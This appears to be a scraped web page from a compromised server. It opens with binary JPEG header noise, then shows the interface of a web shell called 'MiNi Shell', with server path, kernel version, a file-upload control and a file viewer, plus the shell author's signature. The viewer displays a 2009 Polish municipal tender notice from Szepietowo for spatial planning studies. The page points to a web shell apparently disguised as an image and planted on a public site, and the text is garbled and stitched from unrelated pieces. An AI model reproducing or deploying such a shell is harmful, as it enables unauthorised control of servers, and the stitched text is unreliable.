JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090227/43643-N-2009.html

<p class="kh_header"><b>Szepietowo: Opracowanie zmiany Studium oraz 3 Miejscowych Planów Zagospodarowania Przestrzennego (obszarów z terenu gminy Szepietowo) oraz udział w czynnościach związanych z ich sporządzeniem.</b><br>
<b>Numer ogłoszenia: 43643 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szepietowo , ul. Główna 6, 18-210 Szepietowo, woj. podlaskie, tel. 086 4760132, 4760133, faks 086 4760110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szepietowo.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie zmiany Studium oraz 3 Miejscowych Planów Zagospodarowania Przestrzennego (obszarów z terenu gminy Szepietowo) oraz udział w czynnościach związanych z ich sporządzeniem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zmiana Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Szepietowo, uchwalonego uchwałą Nr III/13/06 z dnia 28 grudnia 2006 r., zakres określony Uchwałą Rady Gminy Szepietowo nr XX/136/08  z dnia 30 grudnia 2008r. -  zał. NR 5 do SIWZ.<br>
2. Miejscowy plan zagospodarowania przestrzennego części działki nr 16 położonej w obrębie wsi Wojny Pietrasze, zakres określony Uchwałą Rady Gminy Szepietowo nr XVII/116/08 z dnia 9 września 2008r. -  zał. NR 6 do SIWZ, powierzchnia terenu objętego opracowaniem - ok. 1,5 ha.<br>
3. Miejscowy plan zagospodarowania przestrzennego części miejscowości Szepietowo, w rejonie ulic Ogrodowej i Lipowej, zakres określony Uchwałą Rady Gminy Szepietowo nr XXI/142/09  z dnia 16 lutego  2009r. -  zał. NR 7 do SIWZ, powierzchnia terenu objętego opracowaniem - ok. 4,5 ha.<br>
4. Miejscowy plan zagospodarowania przestrzennego obszaru położonego w obrębie ewidencyjnym Stare Gierałty, Nowe Gierałty i Szepietowo, w ograniczeniu drogi krajowej Nr 66 Zambrów -Wysokie Mazowieckie- Szepietowo- Bielsk Podlaski i drogi powiatowej Nr 2070B Brzózki Brzezińskie -Średnica Pawłowięta - Dąbrówka Kościelna, zakres określony Uchwałą Rady Gminy Szepietowo nr XXI/143/09 z dnia 16 lutego  2009r. -  zał. NR 8 do SIWZ, powierzchnia terenu objętego opracowaniem - ok. 35 ha.<br>
<br>
Zakres dla każdego planu:<br>
1. 5 kompletów wraz z rysunkami (rysunki w skali 1:1000 zafoliowane):
- umieszczenie  opisu  stref, sposobu ich zagospodarowania i obsługi komunikacyjnej oraz  innych szczegółowych wymogów w jednym miejscu, bez (rozrzucania) tych informacji po całej uchwale,<br>
- dodatkowo (dotyczy planu określonego Uchwałą nr XXI/143/09  z dnia 16 lutego): 2 plansze w skali 1:1000 zafoliowane, oprawione  w listwy, przystosowane do zawieszenia na ścianie i do przenoszenia (tzw. fartuch zabezpieczający) + opakowanie do przechowywania w formie zwiniętej -dokumentacja formalno-prawna w jednym egzemplarzu w oryginale i w jeden egzemplarzu w kopii,<br>
2. egzemplarz - format do publikacji w Dzienniku Urzędowym Województwa Podlaskiego,<br>
3. wszystkie, określone obowiązującymi przepisami, opracowania towarzyszące - po 3 egzemplarze,<br>
4. wymagana ilość egzemplarzy opracowań- projektów planu, wymaganych na poszczególnych etapach postępowania (uzgadnianie, opiniowanie, wyłożenie do publicznego wglądu, ...).<br>
<br>
Zakres wersji elektronicznej:<br>
Dokumenty opracować na podkładzie cyfrowym w Systemie Informacji Geograficznej (GIS) po 2 egz. każdego opracowania dostarczyć na CD, część  graficzną rysunku planu należy powiązać z ustaleniami tekstowymi planu-   do części graficznej należy podłączyć część tekstowa planu w taki sposób, że nie trzeba wyszukiwać w tekście uchwały opisu dla poszczególnych wyrysów, ale wyrys i wypis z planu otrzymuje się automatycznie równocześnie.<br>
<br>
Zakres dla studium:<br>
1. 5 kompletów wraz z rysunkami (rysunki  zafoliowane),<br>
2. dokumentacja formalno-prawna w jednym egzemplarzu w oryginale i w jeden egzemplarzu w kopii,<br>
3. egzemplarz - format do publikacji w Dzienniku Urzędowym Województwa Podlaskiego,<br>
4. wszystkie, określone obowiązującymi przepisami, opracowania towarzyszące - po 3 egzemplarze.,<br>
5. wymagana ilość egzemplarzy opracowań- projektów planu, wymaganych na poszczególnych etapach postępowania (uzgadnianie, opiniowanie, wyłożenie do publicznego wglądu, ...),<br>
6. wersja elektroniczna.<br>
<br>
Do obowiązków Wykonawcy należy:<br>
1. pozyskanie materiałów geodezyjnych w zakresie wymaganym do sporządzenia planu/ studium (Starostwo Powiatowe w Wysokiem Mazowieckiem dysponuje bazą danych w programie EWMAP- odpłatnie),<br>
2. przeprowadzenie postępowania (plan/studium), zgodnie z ustawą o planowaniu  i zagospodarowaniu przestrzennym i ustawami powiązanymi, w tym min.:<br>
- przygotowanie pism i  załączników, odpowiednio adresowanych do instytucji i organów właściwych do zawiadamiania, uzgadniania i opiniowania:
zestaw gotowych dokumentów, złożonych w kancelarii Urzędu Gminy, do wysłania (pismo+ zaadresowana koperta ze zwrotnym potwierdzeniem),<br>
- analiza złożonych wniosków i przygotowanie pisemnych odpowiedzi (z uzasadnieniem),<br>
- przygotowanie pisemnych odpowiedzi (z uzasadnieniem) na złożone uwagi do projektu planu/studium,<br>
- obsługa wyłożenia do publicznego wglądu projektów planów miejscowych/ projektu studium (w terminach uzgodnionych z Zamawiającym),<br>
- przygotowanie analizy zgodności planów z ustaleniami studium,<br>
- przygotowanie propozycji rozstrzygnięć - załączników do uchwały, o których mowa w art. 20 ustawy o planowaniu  i zagospodarowaniu przestrzennym, o sposobie rozpatrzenia uwag do projektu planu, o sposobie realizacji, zapisanych w planie, inwestycji z zakresu infrastruktury technicznej oraz zasadach ich finansowania,<br>
3. współpraca z zamawiającym, w tym  uzgadnianie proponowanych rozwiązań- przedłożenie do akceptacji koncepcyjnych rozwiązań,<br>
4. nadzór nad stroną proceduralną (studium, plan),<br>
5. uwzględnienie informacji z wydanych pozwoleń na budowę oraz decyzji o warunkach zabudowy z ostatnich 3 lat oraz z materiałów przekazywanych sukcesywnie przez zamawiającego do dnia skompletowania projektów do opiniowania,<br>
6. rozpatrzenie wniosków dotyczących ustalenia warunków zabudowy dla terenów objętych opracowaniem planów miejscowych: ustalenie war. zabudowy w formie decyzji o war. zabudowy lub uzasadnienie  zawieszenia postępowania,<br>
7. przeszkolenie pracownika Urzędu Gminy w zakresie obsługi opracowanych planów miejscowych  w wersji elektronicznej. Przeszkolenie należy  przeprowadzić przed ostatnim etapem rozliczenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.25.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium o wartości 2 000 PLN.<br>
2. Wadium może być wniesione w następujących formach:<br>
- pieniądzu,<br>
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze  poręczeniem pieniężnym,<br>
- gwarancjach bankowych,<br>
- gwarancjach ubezpieczeniowych,<br>
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. Z 2007r., Nr 42, poz. 275).<br>
<br>
3. Wadium wnoszone w formie pieniężnej- przelewem na rachunek bankowy w Spółdzielczego Banku Rozwoju w Szepietowie, rachunek Nr 65876900020000004220000040, dowód wpłaty wadium należy dołączyć do oferty.<br>
4. Wadium wnoszone w pozostałych formach należy załączyć do oferty (oryginał).<br>
5. Wadium musi być wniesione najpóźniej w terminie składania ofert, tj. do dnia 20 marca  2009 r. do godz. 1000. Za skuteczne wniesienie wadium w pieniądzu zamawiający uważa wadium, które w oznaczonym terminie znajdzie się na koncie zamawiającego.<br>
6. Wykonawca, który nie wniósł  wadium zostanie wykluczony z postępowania.<br>
7. Wykonawca, którego oferta została wybrana traci wadium wraz z odsetkami na rzecz zamawiającego w okolicznościach przewidzianych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nieposiadająca osobowości prawnej oraz podmioty występujące wspólnie (spółka cywilna, zespoły autorskie).<br>
2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ustawy.<br>
3. Opis warunków udziału w postępowaniu:<br>
- wykonawca jest uprawniony do realizacji usług w zakresie określonym zamówieniem,<br>
- wykonawca w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał co najmniej 2 uchwalone obowiązujecie miejscowe plany zagospodarowania przestrzennego, obejmujące tereny zabudowy mieszkaniowej i aktywności gospodarczej, o powierzchni objętej planem  nie mniejszej niż.20 ha (każdy),<br>
- dysponuje lub będzie dysponował co najmniej trzyosobowym zespołem, w którym co najmniej 2 osoby, główny projektant i projektant sprawdzający, są członkami izby urbanistów, wpisanymi aktualnie na listę, a jedna osoba w zespole jest architektem.<br>
4. Za spełnienie warunków udziału w zamówieniu uznaje się przedłożenie (dołączenie do oferty) oświadczeń i dokumentów określonych w pkt VII siwz.<br>
5. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w przedłożonych dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Niespełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnieniu warunków określonych w art. 22 ustawy (zał. nr 2).<br>
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br>
3. Wykonawca będący osobą fizyczną przedkłada dokument potwierdzający przynależność do izby urbanistów.<br>
4. Wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia: co najmniej 2 uchwalone obowiązujecie miejscowe plany zagospodarowania przestrzennego, obejmujące tereny zabudowy mieszkaniowej i aktywności gospodarczej, o powierzchni objętej planem  nie mniejszej niż.20 ha (każdy), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców  oraz załączeniem dokumentów potwierdzających, że zostały wykonane należycie- (zał. nr 3).<br>
5. Wykaz osób, którymi dysponuje  lub będzie dysponował, do wykonania zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia: co najmniej trzyosobowy zespół, w którym  co najmniej 2 osoby, główny projektant i projektant sprawdzający, są członkami izby urbanistów, wpisanymi aktualnie na listę, a jedna osoba w zespole jest architektem - (zał. nr 4).<br>
6. Pisemne zobowiązanie osób do udziału w realizacji zamówienia, jeżeli wykonawca wykazał osoby, którymi będzie dysponował przy wykonywaniu zamówienia.<br>
<br>
Wymagane dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.<br>
<br>
Wykonawcy występujących wspólnie (np. zespół autorski):<br>
W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia mogą  udzielić pełnomocnictwo Wykonawcy - liderowi do reprezentowania ich w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.<br>
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.<br>
Doświadczenie i  potencjał kadrowy Wykonawców występujących wspólnie oceniany będzie w sposób łączny, w celu stwierdzenia czy Wykonawcy wspólnie spełniają warunki udziału w postępowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://ug-szepietowo.pbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Szepietowo, ul. Główna 6, 18-210 Szepietowo, pok. Nr 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 10:00, miejsce: Urząd Gminy Szepietowo, ul. Główna 6, 18-210 Szepietowo, pok. Nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com